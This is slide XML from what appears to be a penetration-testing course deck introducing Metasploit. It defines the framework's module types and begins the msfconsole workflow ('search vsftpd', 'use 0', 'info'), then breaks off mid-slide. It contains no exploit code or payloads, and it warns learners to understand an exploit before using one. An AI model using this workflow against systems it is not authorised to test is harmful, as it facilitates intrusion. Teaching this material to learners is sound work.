      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 0" descr="img/msf_wordmark.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8138160" y="1481328"/>
            <a:ext cx="3474720" cy="758952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="1508760"/>
            <a:ext cx="7315200" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A framework, not a magic button. It is a large library of exploits, payloads and helper modules, plus the plumbing that connects them and manages your sessions.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2606040"/>
            <a:ext cx="1554480" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="2624328"/>
            <a:ext cx="3794760" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Code that abuses a specific bug in a specific version</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="2606040"/>
            <a:ext cx="1554480" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7909560" y="2624328"/>
            <a:ext cx="3794760" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>What runs on the target once the exploit lands</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3566160"/>
            <a:ext cx="1554480" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>auxiliary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="3584448"/>
            <a:ext cx="3794760" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Scanners, fuzzers, enumeration. No payload involved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="3566160"/>
            <a:ext cx="1554480" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>post</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7909560" y="3584448"/>
            <a:ext cx="3794760" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Modules you run after you have a session</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4526280"/>
            <a:ext cx="1554480" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>encoder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="4544568"/>
            <a:ext cx="3794760" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Reshapes a payload to survive filters and bad characters</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="4526280"/>
            <a:ext cx="1554480" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7909560" y="4544568"/>
            <a:ext cx="3794760" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Padding, mostly relevant to memory corruption exploits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="5486400"/>
            <a:ext cx="11091672" cy="1005840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6364"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1B1033"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="5669280"/>
            <a:ext cx="10515600" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A warning about learning order:  </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Metasploit will happily give you root without teaching you anything. Use it after you understand what the exploit does, not instead of understanding it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="145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06 / EXPLOITATION</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The msfconsole loop</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48</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="1572768"/>
            <a:ext cx="457200" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>01</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1517904"/>
            <a:ext cx="4572000" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>search vsftpd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5760720" y="1545336"/>
            <a:ext cx="5852160" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Find modules by name, CVE, platform or type</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="2148840"/>
            <a:ext cx="457200" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="2093976"/>
            <a:ext cx="4572000" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>use 0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5760720" y="2121408"/>
            <a:ext cx="5852160" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Select a module by index or full path</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="2724912"/>
            <a:ext cx="457200" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>03</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="2670048"/>
            <a:ext cx="4572000" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>info</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5760720" y="2697480"/>
            <a:ext cx="5852160" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
